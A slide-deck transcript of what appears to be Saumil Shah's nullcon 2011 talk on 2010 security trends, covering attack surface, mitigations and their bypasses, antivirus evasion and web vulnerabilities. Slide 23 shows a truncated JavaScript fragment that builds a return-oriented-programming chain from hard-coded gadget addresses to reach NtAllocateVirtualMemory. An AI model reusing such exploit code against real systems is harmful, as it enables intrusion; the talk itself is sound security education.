
nullcon 2011 - Lessons learned from 2010


Lessons learned from 2010 by Saumil Shah

Published in: Technology

  1. 2010: A Net Odyssey - Saumil Shah, nullcon Goa, 26.02.2011 (net-square | n|u dwitiya)
  2. Welcome to nullcon!
  3. # who am i - Saumil Shah, CEO, Net-Square. saumilshah. Hacker.
  4. What did we learn from 2010?
  5. (no text on this slide)
  6. Attack Surface
  7. Attack Surface 2010-2011
  8. Wider Attack Surface
  9. Ease of Exploitation
  10. Mass Manufacturing - "World wide coverage, hides your tracks."
  11. Complexity... - "never seen before!"
  12. A New Dimension! - "Fresh new bugs, GUARANTEED!! Present on most computers"
  13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Wars; Death of Standards; HTTP +0.1; Reckless Plugins
  14. Exploit Mitigation Techniques
  15. /GS, SafeSEH, DEP, ASLR, Permanent DEP, ASLR and DEP
  16. Mitigation and the bypass that answered it: /GS - SEH overwrites; SafeSEH - non-SEH DLLs; DEP - Return to LibC; ASLR - Heap Sprays; Permanent DEP - ROP; ASLR and DEP - JIT Sprays
  17. It's SPLOIT TIME!
  18. Jedi A/V Tricks - "These are not the sploitz you're looking for"
  19. Obfuscated JavaScript decoded without using eval, document.write, etc. - "See no eval!" Acrobat CoolType exploit; IE+JNLP exploit
  20. High Tech vs. Low Tech: Acrobat CoolType exploit - Return Oriented Programming code; Escape-From-PDF - No fancy tricks
  21. This iz what?
  22. "I'm an evil Javascript" / "I'm an innocent image"
  23. JavaScript shown on the slide (the extraction had it interleaved into two columns; it is reconstructed below). The listing stops at var retval="" and is followed on the slide by the word <CANVAS>; the remainder of call_ntallocatevirtualmemory is not on the page.
      // packv: 32-bit value -> two %u-escaped UTF-16 code units, low word first,
      // so the string's bytes in memory are the little-endian address
      function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
      // gadget table: name -> address (two entries are still 0x00000000, i.e. unresolved)
      var addressof=new Array();
      addressof["ropnop"]=0x6d81bdf0;
      addressof["xchg_eax_esp_ret"]=0x6d81bdef;
      addressof["pop_eax_ret"]=0x6d906744;
      addressof["pop_ecx_ret"]=0x6d81cd57;
      addressof["mov_peax_ecx_ret"]=0x6d979720;
      addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
      addressof["mov_pecx_eax_ret"]=0x6d8eee01;
      addressof["inc_eax_ret"]=0x6d838f54;
      addressof["add_eax_4_ret"]=0x00000000;
      addressof["call_peax_ret"]=0x6d8aec31;
      addressof["add_esp_24_ret"]=0x00000000;
      addressof["popad_ret"]=0x6d82a8a1;
      addressof["call_peax"]=0x6d802597;
      // builds the ROP chain that reaches NtAllocateVirtualMemory; each gadget is packed once
      function call_ntallocatevirtualmemory(baseptr,size,callnum){
      var ropnop=packv(addressof["ropnop"]);
      var pop_eax_ret=packv(addressof["pop_eax_ret"]);
      var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
      var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
      var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
      var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
      var call_peax_ret=packv(addressof["call_peax_ret"]);
      var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
      var popad_ret=packv(addressof["popad_ret"]);
      var retval=""
  24. Server Side Vulnerabilities
  25. SQL injection, XSS, CSRF, RFI/LFI, Input tampering
  26. Who broke the Web? HTML: Old and idiotic; Object SRC=; JS too powerful. HTTP: Stateless; No Auth; Bursty access. Standards... What Standards?
  27. W3C: "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  28. Application: Delivery, Authentication, Statefulness, Data Typing, Non-mutable
  29. The Web Application at present: Delivery, Authentication, Statefulness, Data Typing, Non-mutable, surrounded by HTTP, AJAX, HTML, Flash, Sandbox, HTML5, Anti-XSS, WAF, Silverlight, Web sockets
  30. The FUTURE is HERE!
  31. No longer Science Fiction: DEP bypassing, Man in the Browser, ROP code, Malware, Political Cyber warfare
  32. The Solution?
  33. Keep on patching!
  34. "I can haz sandbox" / "I Also Can!"
  35. The Solution? HTML 8.0, HTTP 2.0, Browser Security Model, Self Contained Apps
  36. kthxbai (n|u dwitiya)